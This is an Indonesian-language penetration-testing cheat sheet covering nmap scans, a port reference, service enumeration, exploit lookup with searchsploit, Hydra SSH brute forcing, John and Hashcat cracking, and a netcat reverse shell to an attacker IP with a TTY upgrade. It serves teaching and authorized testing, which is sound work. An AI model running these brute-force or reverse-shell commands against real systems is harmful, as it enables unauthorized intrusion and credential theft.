VA-PT Cheatsheet

Cheatsheet untuk Pentesting.

Catatan ini ditujukan untuk mempermudah pencarian payload/script tools dalam pentesting/VA.Cheatsheet ini disadur dari akun Github rekan saya Satrya Mahardhika.

5 Tahap Ethical Hacking

Metode Uji Ringkas

NMAP Command

Berikut beberapa rangkuman perintah NMAP untuk tujuan reconnaissance. (Pindah dengan klik tab)

nmap -sC -sV -p- -T4 Target IP

	nmap -sV Target_IP

	nmap -sT Target IP

	nmap -sU Target IP

nmap --vuln Target IP

NMAP Command

Options

Description

-sT

TCP Connect port scan

-sU

UDP Port scan

-p

specific port scan

-p-

Scan All ports

-sV

Check Version of running service

-sC

Scan with default safe Scripts

-O

OS Fingerprinting

Command

Scan For

nmap -sV Target_IP

Open TCP Ports and versions

nmap -sT Target IP

Open TCP Ports

nmap -sU Target IP

Open UDP Ports

nmap -sC -sV -p- Target IP

Open All TCP Ports and Versions + Scan with default NSE Scripts

nmap --vuln Target IP

Scan for vulnerability ()

Anda dapat mencari script NMAP pada:

ls /usr/share/nmap/scripts

Interesting Port

Port

Deskripsi

Port

Deskripsi

FTP server, unencrypted.

161, 162

SNMP Service

SSH server, can be connected to via SSH

389, 636

LDAP Directory Service

Telnet. Basically an unencrypted SSH

443

HTTPS, check for HeartBleed? View certificate for information?

SMTP - Email sending service.

445

SMB Shares service, likely vulnerable to an SMB RCE

TFTP Server. Very uncommon and old. Uses UDP.

587

Submission. If Postfix is run on it, it could be vunerable to shellshock

HTTP Server. Try visiting IP with web browser.

631

CUPS. Basically a Linux Printer Service for sharing printers.

1433

Default MSSQL port. sqsh -S 10.1.11.41 -U sa

110

POP3 mail service. Login via telnet or SSH?

1521

Oracle DB. tnscmd10g version -h 10.1.11.51

111

RPCbind. This can help us look for NFS-shares

2021

119

Network Time Protocol

2049

Network File System. showmount -e 10.1.11.64

135

MSRPC - Microsoft RPC

3306

MySQL Database. Connect: mysql --host=10.1.11.69 -u root -p

139

SMB Service. likely vulnerable to an SMB RCE

3389

Listening for RDP connection

Enumeration

SSH

Try connect to ssh service

ssh kali@10.131.2.128

FTP

Check for Anonymous login allowed. Use username: anonymous ; password: (blank or anything).(Pindah dengan klik tab)

ftp open Target_IP

get <nama file>

SMB

Connect ke SMB untuk mengecek Shares yang available. (Pindah dengan klik tab)

smbclient //Target_IP/Shares_name

SMTP

Verify SMTP Port using netcat

nc -nv Target_IP 25

POP3

root@kali:~# telnet $ip 110
+OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
USER billydean    
+OK
PASS password
+OK Welcome billydean

list

+OK 2 1807
1 786
2 1021

retr 1

+OK Message follows
From: jamesbrown@motown.com
Dear Billy Dean,

Here is your login for remote desktop ... try not to forget it this time!
username: billydean
password: PA$$W0RD!Z

HTTP

Anda dapat melakukan directory finding dengan dirb (+menggunakan wordlist).

dirb http://<ip target>/ /usr/share/wordlists/dirb/common.txt

Anda dapat melakukan scanning dengan Nikto. Kemudian, apabila website menggunakan CMS tertentu lakukan scan CMS (contoh WPScan). (Pindah dengan klik tab)

nikto -h http://<ip_target>

wpscan --url http://target.com

Mencari Exploit

Melalui Mesin Pencari (Google)

Perhatikan dan cari versi aplikasi yang kemungkinan rawan.
Lakukan pencarian di mesin pencari dengan format "[APLIKASI] [VERSI] [EXPLOIT]" . Contoh: "Samba 3.5.0 exploit"
Prioritaskan sumber dari ExploitDB / Github /Rapid7.
Unduh dan gunakan exploit sesuat keterangan pada sumber terkait.

Melalui Searchploit (Kali)

searchsploit linux 2.2.0
#Mencari exploit dengan keyword tertentu contoh linux 2.2.0
#Mendownload (Copy) exploit ke working directory

searchsploit -m Nomor_Exploit

wget Alamat_URL
#Download File

Bruteforce/Hash Cracking (sample)

SSH Bruteforce With Hydra

hydra -L users.txt -P pass.txt 192.168.1.181 ssh

John The Ripper common hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Hashcat crack md5

hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --outfile=cracked.txt

Command Execution Guide

Reverse Shell

(Pindah dengan klik tab)

nc -nlvp 4444

nc -nv IP_Attacker Port -e /bin/bash

Sumber lain untuk membuat reverse shell disini .

Upgrade ke Interactive Shell

python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
<ENTER>
<ENTER>

Sumber lain untuk interactive shell dapat dicek di Linux TTY Shell Cheat Sheet

PreviousLinux Command Intro NextNMAP Cheatsheet

Last updated 1 year ago